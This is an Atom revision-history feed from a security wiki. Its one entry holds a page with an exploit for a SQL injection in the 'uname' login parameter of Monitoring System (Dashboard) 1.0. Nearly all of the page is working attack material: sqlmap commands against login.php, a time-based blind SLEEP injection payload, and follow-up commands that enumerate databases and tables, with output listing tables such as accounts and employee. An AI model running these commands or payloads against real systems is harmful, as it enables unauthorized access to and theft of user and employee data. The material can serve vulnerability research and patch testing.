<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Monitoring_System_%28Dashboard%29_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>Monitoring System (Dashboard) 1.0 SQL注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Monitoring_System_%28Dashboard%29_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Monitoring_System_(Dashboard)_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-20T23:35:43Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Monitoring_System_(Dashboard)_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=1274&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection # Exploit Author: Richard Jones # Date: 2021-01-26 # Vendor Homepage: https://www.sour...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Monitoring_System_(Dashboard)_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=1274&amp;oldid=prev"/>
		<updated>2021-04-08T09:48:52Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: Monitoring System (Dashboard) 1.0 - &amp;#039;uname&amp;#039; SQL Injection # Exploit Author: Richard Jones # Date: 2021-01-26 # Vendor Homepage: https://www.sour...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Monitoring System (Dashboard) 1.0 - 'uname' SQL Injection&lt;br /&gt;
# Exploit Author: Richard Jones&lt;br /&gt;
# Date: 2021-01-26&lt;br /&gt;
# Vendor Homepage: https://www.sourcecodester.com/php/11741/monitoring-system-dashboard.html&lt;br /&gt;
# Software Link: https://www.sourcecodester.com/download-code?nid=11741&amp;amp;title=Monitoring+System+%28Dashboard%29+using+PHP+with+Source+Code&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34&lt;br /&gt;
&lt;br /&gt;
Steps. &lt;br /&gt;
&lt;br /&gt;
1. Run sqlmap&lt;br /&gt;
&amp;quot;sqlmap -u &amp;quot;http://localhost/asistorage/login.php&amp;quot; --data=&amp;quot;uname=a&amp;amp;upass=w&amp;amp;btnlogin=&amp;quot; --batch&lt;br /&gt;
&lt;br /&gt;
2. &lt;br /&gt;
Parameter: uname (POST)&lt;br /&gt;
    Type: time-based blind&lt;br /&gt;
    Title: MySQL &amp;gt;= 5.0.12 AND time-based blind (query SLEEP)&lt;br /&gt;
    Payload: uname=a' AND (SELECT 4539 FROM (SELECT(SLEEP(5)))zdoW) AND 'YWTS'='YWTS&amp;amp;upass=w&amp;amp;btnlogin=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Exploit paths: &lt;br /&gt;
&lt;br /&gt;
Database: &lt;br /&gt;
sqlmap -u &amp;quot;http://localhost/asistorage/login.php&amp;quot; --data=&amp;quot;uname=a&amp;amp;upass=w&amp;amp;btnlogin=&amp;quot; --batch --dbms=mysql --dbs&lt;br /&gt;
&lt;br /&gt;
Tables: &lt;br /&gt;
sqlmap -u &amp;quot;http://localhost/asistorage/login.php&amp;quot; --data=&amp;quot;uname=a&amp;amp;upass=w&amp;amp;btnlogin=&amp;quot; --batch --dbms=mysql -D asidatabase --tables&lt;br /&gt;
[11 tables]&lt;br /&gt;
+------------+&lt;br /&gt;
| accounts   |&lt;br /&gt;
| attendance |&lt;br /&gt;
| contacts   |&lt;br /&gt;
| employee   |&lt;br /&gt;
| gallery    |&lt;br /&gt;
| msexcel    |&lt;br /&gt;
| msppt      |&lt;br /&gt;
| msword     |&lt;br /&gt;
| oic        |&lt;br /&gt;
| random     |&lt;br /&gt;
| sign       |&lt;br /&gt;
+------------+&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>